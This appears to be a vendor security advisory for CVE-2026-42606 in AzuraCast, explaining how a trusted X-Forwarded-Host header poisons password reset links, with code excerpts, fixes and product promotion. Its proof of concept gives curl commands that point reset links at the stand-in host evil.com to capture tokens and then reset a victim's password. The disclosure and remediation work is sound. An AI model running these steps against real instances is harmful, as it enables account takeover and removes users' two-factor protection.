CVE-2026-42606

CVE-2026-42606 is a high-severity security vulnerability in azuracast/azuracast (composer), affecting versions <= 0.23.5. It is fixed in 0.23.6.

Summary

The ApplyXForwarded middleware unconditionally trusts the client-supplied X-Forwarded-Host HTTP header with no trusted proxy allowlist. An unauthenticated attacker can poison the password reset URL sent to any user by injecting this header when triggering the forgot-password flow. When the victim clicks the poisoned link, their reset token is exfiltrated to the attacker's server. The attacker then uses the token on the real instance to reset the victim's password and destroy their 2FA configuration, achieving full account takeover.

Details

Root Cause 1: Unconditional X-Forwarded-Host Trust

backend/src/Middleware/ApplyXForwarded.php:35-40:

if ($request->hasHeader('X-Forwarded-Host')) {
    $hasXForwardedHeader = true;
    $xfHost = Types::stringOrNull($request->getHeaderLine('X-Forwarded-Host'), true);
    if (null !== $xfHost) {
        $uri = $uri->withHost($xfHost);
    }
}

There is no validation that the request originates from a trusted reverse proxy. Any direct client can set this header and it will be accepted.

In the default Docker deployment, nginx's PHP location block (util/docker/web/nginx/azuracast.conf.tmpl:150-171) uses fastcgi_pass with include fastcgi_params. Standard nginx behavior passes all client HTTP headers through to PHP-FPM as HTTP_* parameters. The proxy_params.conf file, which explicitly sets X-Forwarded-For, X-Forwarded-Proto, and X-Forwarded-Port, only applies to proxy_pass directives (websocket and vite dev server), NOT to the fastcgi_pass PHP handler. Therefore, client-supplied X-Forwarded-Host reaches PHP unmodified.

Root Cause 2: Request Host Used for Security-Critical URLs

backend/src/Http/Router.php:53-77 in buildBaseUrl():

$useRequest ??= $settings->prefer_browser_url; // default: true

// ...
if ($useRequest || $baseUrl->getHost() === '') {
    $ignoredHosts = ['web', 'nginx', 'localhost'];
    if (!in_array($currentUri->getHost(), $ignoredHosts, true)) {
        $baseUrl = (new Uri())
            ->withScheme($currentUri->getScheme())
            ->withHost($currentUri->getHost())
            ->withPort($currentUri->getPort());
    }
}

With prefer_browser_url = true (the default at backend/src/Entity/Settings.php:109), the request URI host, already poisoned by ApplyXForwarded, is used as the base URL for generating absolute URLs. Even if a base_url is configured in settings, it is overridden by the poisoned request host.

Root Cause 3: Password Reset Generates Absolute URL

backend/src/Controller/Frontend/Account/ForgotPasswordAction.php:72-77:

$router = $request->getRouter();
$url = $router->named(
    routeName: 'account:login-token',
    routeParams: ['token' => $token],
    absolute: true
);

This URL is embedded in the password reset email sent to the victim.

Root Cause 4: Reset Token Wipes 2FA

backend/src/Controller/Frontend/Account/LoginTokenAction.php:74-75:

$user->setNewPassword($data['password']);
$user->two_factor_secret = null;

When a ResetPassword token is consumed, the user's 2FA secret is unconditionally destroyed.

PoC

Prerequisites: An AzuraCast instance with a user account (e.g., [email protected]) that has 2FA enabled. Attacker controls evil.com with a web server that logs incoming requests.

Step 1: Trigger poisoned password reset

curl -X POST https://target.azuracast.example/forgot \
  -H "X-Forwarded-Host: evil.com" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "[email protected]"

Expected result: The password reset email sent to [email protected] contains a URL like:

https://evil.com/login-token/abc123def456...

Step 2: Capture the token

When the victim clicks the link in their email, their browser navigates to https://evil.com/login-token/abc123def456.... The attacker's web server at evil.com captures the full URL path, extracting the token abc123def456....

Step 3: Use token on real instance

# First, GET the reset page to obtain CSRF token
curl -c cookies.txt https://target.azuracast.example/login-token/abc123def456...

# Extract CSRF token from response, then POST new password
curl -b cookies.txt -X POST https://target.azuracast.example/login-token/abc123def456... \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "csrf=<extracted_csrf_token>&password=AttackerPassword123"

Result: The victim's password is changed to AttackerPassword123 and their 2FA is destroyed (two_factor_secret = null). The attacker is logged in with full access.

Impact

  • Full account takeover of any user account, including administrators, without any prior authentication
  • 2FA bypass, the password reset flow unconditionally destroys 2FA configuration, negating its security benefit
  • Administrative compromise, if the target is an admin account, the attacker gains full control of the AzuraCast instance, including all stations, media, and system settings
  • The attack requires the victim to click a link in a legitimate-looking password reset email from the real AzuraCast mail system, which increases the likelihood of success

CVE-2026-42606 has a CVSS score of 8.1 (High). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.23.6); upgrading removes the vulnerable code path.

Affected versions

azuracast/azuracast (<= 0.23.5)

Security releases

azuracast/azuracast → 0.23.6 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Fix 1 (Primary): Validate X-Forwarded-Host against a trusted proxy allowlist

In backend/src/Middleware/ApplyXForwarded.php, only apply X-Forwarded-* headers when the request originates from a trusted proxy (e.g., the Docker-internal nginx):

// Add trusted proxy check
$trustedProxies = ['127.0.0.1', '::1', 'nginx', 'web'];
$remoteAddr = $request->getServerParams()['REMOTE_ADDR'] ?? '';

if (!in_array($remoteAddr, $trustedProxies, true)) {
    return $handler->handle($request);
}

// ... existing X-Forwarded-* processing

Fix 2 (Defense in depth): Use configured base URL for security-critical emails

In ForgotPasswordAction.php, generate the reset URL using the configured base_url setting rather than the request-derived URL:

$router = $request->getRouter();
$url = $router->named(
    routeName: 'account:login-token',
    routeParams: ['token' => $token],
    absolute: true,
    // Force use of configured base URL, not request host
);

Or modify Router::buildBaseUrl() to never use request-derived hosts for absolute URLs by adding an option to force the configured base URL.

Fix 3 (Defense in depth): Don't wipe 2FA on password reset

In LoginTokenAction.php:75, remove the line $user->two_factor_secret = null;. If 2FA recovery is needed, it should be a separate, explicit flow, not a side effect of password reset.

Frequently Asked Questions

  1. What is CVE-2026-42606? CVE-2026-42606 is a high-severity security vulnerability in azuracast/azuracast (composer), affecting versions <= 0.23.5. It is fixed in 0.23.6.
  2. How severe is CVE-2026-42606? CVE-2026-42606 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of azuracast/azuracast are affected by CVE-2026-42606? azuracast/azuracast (composer) versions <= 0.23.5 is affected.
  4. Is there a fix for CVE-2026-42606? Yes. CVE-2026-42606 is fixed in 0.23.6. Upgrade to this version or later.
  5. Is CVE-2026-42606 exploitable, and should I be worried? Whether CVE-2026-42606 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-42606 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-42606? Upgrade azuracast/azuracast to 0.23.6 or later.

Other vulnerabilities in azuracast/azuracast

CVE-2026-42606CVE-2026-42605CVE-2025-67737CVE-2023-2531CVE-2023-2191

Stop the waste.
Protect your environment with Kodem.